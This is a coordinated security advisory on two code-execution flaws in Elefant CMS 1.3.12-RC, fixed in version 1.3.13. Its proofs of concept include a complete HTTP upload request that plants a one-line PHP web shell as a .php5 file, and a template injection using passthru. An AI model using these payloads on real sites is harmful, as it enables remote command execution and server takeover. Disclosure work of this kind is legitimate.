Elefant CMS 1.3.12-RC: Code Execution
Date: 2017-02-02 11:47:581. Introduction
| Affected Product: | Elefant CMS 1.3.12-RC |
| Fixed in: | 1.3.13 |
| Fixed Version Link: | https://github.com/jbroadway/elefant/releases/tag/elefant_1_3_13_rc |
| Vendor Website: | https://www.elefantcms.com/ |
| Vulnerability Type: | Code Execution |
| Remote Exploitable: | Yes |
| Reported to vendor: | 09/05/2016 |
| Disclosed to public: | 02/02/2017 |
| Release mode: | Coordinated Release |
| CVE: | n/a (not requested) |
| Credits | Tim Coen of Curesec GmbH |
2. Overview
Elefant is a content managment system written in PHP. In version 1.3.12-RC, it is vulnerable to code execution because of two different vulnerabilities. It allows the upload of files with dangerous type, as well as PHP code injection. To exploit this a editor or admin account is required.
3. Details
Upload of file with dangerous type
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
The file upload forbids the uploading of files with the .php extension, but allows uploading of files with a number of other dangerous extensions leading to code execution and XSS.
A user account is required which has the right to upload and manage files. By default, the editor or admin role have this right.
Proof of Concept:
POST /filemanager/upload/drop HTTP/1.1 Host: localhost Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=------multipartformboundary1472116478634 X-Requested-With: XMLHttpRequest Content-Length: 316 Cookie: PHPSESSID=57uejmot41c4jsbtbac85mek55; elefant_update_checked=1; elefant_last_page=%2Fuser; elefant_user=nj86h42vi2j73tsturvq4slr05 Connection: close --------multipartformboundary1472116478634 Content-Disposition: form-data; name="path" --------multipartformboundary1472116478634 Content-Disposition: form-data; name="file"; filename="test.php5" Content-Type: application/x-php <?php passthru($_GET['x']); --------multipartformboundary1472116478634--
PHP Code Injection
CVSS: High 9.0 AV:N/AC:L/Au:S/C:C/I:C/A:C
The layout editor provides the option to create HTML templates. Additionally, it allows to use a small subset of PHP constructs, namely: {{ var }} {% foreach %} {% if %} {! handler !} {" text "}.
However, an attacker can use this functionality to execute arbitrary commands via a template.
An account with the right to edit themes is required. By default, the admin role has this right.
Proof of Concept:
Visit http://localhost/designer/add/layout Enter {{passthru('id')}} In the textarea.
4. Solution
To mitigate this issue please upgrade at least to version 1.3.13.
Please note that a newer version might already be available.
5. Report Timeline
| 09/05/2016 | Informed Vendor about Issue, Vendor announces fix |
| 11/07/2016 | Asked Vendor if recent releases fixes issues, Vendor confirmed |
| 02/02/2017 | Disclosed to public |